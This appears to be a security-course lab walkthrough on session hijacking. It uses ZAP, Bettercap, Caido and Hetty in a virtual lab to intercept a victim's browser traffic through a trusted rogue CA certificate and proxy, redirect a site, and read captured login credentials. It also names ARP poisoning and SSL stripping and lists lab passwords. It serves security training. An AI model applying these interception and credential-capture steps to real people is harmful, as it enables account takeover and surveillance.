1. Perform Session Hijacking
Session hijacking allows an attacker to take over an active session by bypassing the authentication process.
Last updated
Session hijacking allows an attacker to take over an active session by bypassing the authentication process.
Last updated
Set the browser proxy to go through Attack PC running ZAP. Now go to the break tab (same as intercept in Burp).
Now set the proxy settings
Click the Set break on all requests and responses icon on the main ZAP toolbar. This button sets and unsets a global breakpoint that will trap and display the next response or request from the victim's machine in the Break tab. Note: The Set break on all requests and responses icon turns automatically from green to red.
Now when the victim browses the sites, his request will be intercepted and we can forward request one by one. We can modify the parameter as we want.
Reference
Bettercap help
Start bettercap
Type Help to list all commands.
To detect hosts on network
Now enable ssl strip (HTTPS to HTTP)
Now lets do the arp poisoning
Now turn on http proxy and sniffer
To set the sniffer to capture only passwords, we can use the following
Caido assists security professionals and enthusiasts in efficiently auditing web applications. It offers exploration tools, including sitemap, history, and intercept features, which aid in identifying vulnerabilities and analyzing requests in real-time.
Run ipconfig/flushdns command to reset dns cache and close the Command Prompt.
Click windows Search icon on the Desktop, search for Caido and launch Caido from search bar.
Caido application window appears, click on menu besides Start button and select Edit.
In Edit Instance window, click on the radio button besides All interfaces (0.0.0.0) to listen on all the available network interfaces and click on Save.
Click on Start button to start the local instance.
Welcome to Caido pop-up appears, click on Login if you have an account already. If not, select Don't have an account?, you will be redirected to Dashboard.
Create an account window appears, here fill in the details and click on Create account.
Login to your mail account, you will receive a verification mail from Team Caido copy the code and paste it in the Caido verification window.
After entering the code, your account will be activated as shown in the screenshot.
Navigate back to Caido application, in Welcome to Caido pop-up click on Login.
Welcome to Caido page will appear, enter your credentials and click Login.
Once logged in, Register your Caido Instance pop-up will appear. Type Session Hijacking and click Register.
Sign in with Caido window appears, click Allow to allow the access. Authorization Complete! pop-up appears, close the web browser and return to the application.
The Caido main window appears.
If a Caido pop-up appears, click Next or Ok in all the pop-ups.
Click on + Create a project button to create a new project. Create a project pop-up appears, name it as Session Hijacking and click Create.
Click on Intercept option on the left pane, as shown in the screenshot below.
Click the Forwarding icon and wait until it changes to Queuing. This button will trap and display the next response or request from the victim’s machine in the Intercept tab.
The Forwarding icon turns automatically from green to red.
Click Windows Server 2019 to switch to the Windows Server 2019 machine. Click Ctrl+Alt+Delete to activate the machine and login using Administrator/Pa$$w0rd.
Networks screen appears, click Yes to allow your PC to be discoverable by other PCs and devices on the network.
Open Firefox web browser and navigate to http://10.10.1.11:8080/ca.crt. CA certificate will be downloaded automatically as shown in the screenshot.
In Firefox web browser, select Settings from the context menu.
On the Settings page, search for Certificates and open View Certificates.
Navigate to Authorities tab and click on Import…
In Select File containing CA certificate(s) to import window, select the recently downloaded ca.crt file and click Open.
When prompted, click the Trust this CA to identify websites checkbox and click on OK. Click OK in the Certificate Manager window.
On the Settings page, search for proxy and open it.
Connection Settings page appears and click Manual proxy configuration to configure a proxy.
Set HTTP Proxy to 10.10.1.11 and port to 8080, check the Also use this proxy for HTTPS box and click OK.
After saving, close the Settings and browser windows. You have now configured the proxy settings of the victim’s machine.
Open a new tab in Firefox web browser and place your mouse cursor in the address bar, type www.moviescope.com and press Enter.
If a message appears, stating that Your connection is not private. Click the Advanced button.
On the next page, click Proceed to www.moviescope.com (unsafe) to open the website.
Now, click Windows 11 to switch back to the attacker machine (Windows 11) and observe that Caido has begun to capture the requests of the victim’s machine.
On the Requests tab, for all www.moviescope.com requests, modify www.moviescope.com to www.goodshopping.com in all the captured GET requests and Forward all the requests.
In a similar way, modify every GET request captured by Caido until you see the www.goodshopping.com page in the victim’s machine. You will need to switch back and forth from the victim’s machine to see the browser status while you do this.
If you do not receive any request or you see a blank Requests tab then switch to Windows Server 2019 machine and refresh the browser to capture the request again.
Now, click on Windows Server 2019 to switch to the victim’s machine (Windows Server 2019); the browser displays the website that the attacker wants the victim’s machine to see (in this example, www.goodshopping.com).
The victim has navigated to www.moviescope.com, but now sees www.goodshopping.com; while the address bar displays www. moviescope.com, the window displays www.goodshopping.com.
Now, we shall change the proxy settings back to the default settings. To do so, in the Firefox browser, select Settings from the context menu. On the Settings page, search for proxy and open it. Connection Settings page appears, check No Proxy radio button and click OK.
Hetty is an HTTP toolkit for security research. It aims to become an open-source alternative to commercial software such as Burp Suite Pro, with powerful features tailored to the needs of the InfoSec and bug bounty communities. Hetty can be used to perform Machine-in-the-middle (MITM) attack, manually create/edit requests, and replay proxied requests for HTTP clients and further intercept requests and responses for manual review.
Double-click hetty.exe.
If an Open File - Security Warning window appears, click Run.
A Command Prompt window appears, and Hetty initializes.
Now, minimize all the windows and launch any web browser (here, Mozilla Firefox). Go to http://localhost:8080 to open Hetty dashboard.
In the Hetty dashboard, click MANAGE PROJECTS button.
Projects page appears, type Project name as Moviescope and click + CREATE & OPEN PROJECT button.
You can observe that a new project name Moviescope has been created under Manage projects section with a status as Active.
A Proxy logs page appears, as shown in the screenshot.
Now, click Windows Server 2022 to switch to the Windows Server 2022 machine. Click Ctrl+Alt+Delete to activate the machine and login using Administrator/Pa$$w0rd.
Networks screen appears, click Yes to allow your PC to be discoverable by other PCs and devices on the network.
Open Google Chrome web browser, click the Customize and control Google Chrome icon, and select Settings from the context menu.
On the Settings page, scroll-down and click System in the left-pane.
Scroll-down to the System section and click Open your computer’s proxy settings to configure a proxy.
A Settings window appears, with the Proxy settings in the right pane.
In the Manual proxy setup section, make the following changes:
Under the Use a proxy server option, click the Off button to switch it On.
In the Address field, type 10.10.1.11 (the IP address of the attacker’s machine, here, Windows 11).
In the Port field, type 8080.
Click Save.
After saving, close the Settings and browser windows. You have now configured the proxy settings of the victim’s machine.
Now, in the web browser go to http://www.moviescope.com.
Click Windows 11 to switch to the Windows 11 machine.
You can observe that the logs are captured in the Proxy logs page. Here, we are focusing on logs associated with moviescope.com website.
Click Windows Server 2022 to switch back to the Windows Server 2022 machine.
In the MovieScope website, login as a victim with credentials as sam/test.
Now, click Windows 11 to switch to the Windows 11 machine.
In the Proxy logs page, scroll-down to check more logs on moviescope website. Check for POST log captured for the target website.
Select the POST request and in the lower section of the page, select Body tab under POST section.
Under the Body tab, you can observe the captured user credentials, as shown in the screenshot.
The captured credentials can be used to log in to the target user’s account and obtain further sensitive information.
Now, we shall change the proxy settings back to the default settings. To do so, click Windows Server 2022 to switch back to the Windows Server 2022 machine and perform Steps 13-15 again.
In the Settings window, under the Manual proxy setup section in the right pane, click the On button to toggle it back to Off, as shown in the screenshot.
Click Proxy logs icon ( )) from the left-pane.
